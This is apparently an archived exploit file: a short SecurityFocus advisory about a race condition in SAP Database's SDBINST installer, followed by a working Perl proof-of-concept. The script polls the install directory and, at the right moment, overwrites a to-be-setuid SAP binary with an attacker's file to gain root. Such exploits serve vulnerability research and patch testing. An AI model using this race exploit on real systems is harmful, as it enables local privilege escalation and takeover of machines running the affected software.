21 lines
No EOL
744 B
Perl
Executable file
21 lines
No EOL
744 B
Perl
Executable file
source: https://www.securityfocus.com/bid/7421/info
|
|
|
|
SAP Database SDBINST has been reported prone to a race condition vulnerability.
|
|
|
|
It has been reported that the SAP Database install tool SDBINST may perform operations non-atomically when installing the SAP database. This condition may open a window of opportunity for a malicious user to replace one of two SAP Database files with a malicious file, before SBDINST sets the setuid bit on the files.
|
|
|
|
An attacker may exploit this vulnerability to gain root privileges.
|
|
|
|
#!/bin/perl
|
|
|
|
while (1) {
|
|
|
|
$test =`grep -sh PRECOM.ins
|
|
/tmp/sapdb-server-linux-32bit-i386-7_3_0_29/y/config/install/LIST*`;
|
|
|
|
if ( $test =~ /PRECOM/ ) {
|
|
system("cp /home/lwc/run /usr/sapdb/depend/pgm/lserver");
|
|
exit(1);
|
|
}
|
|
|
|
} |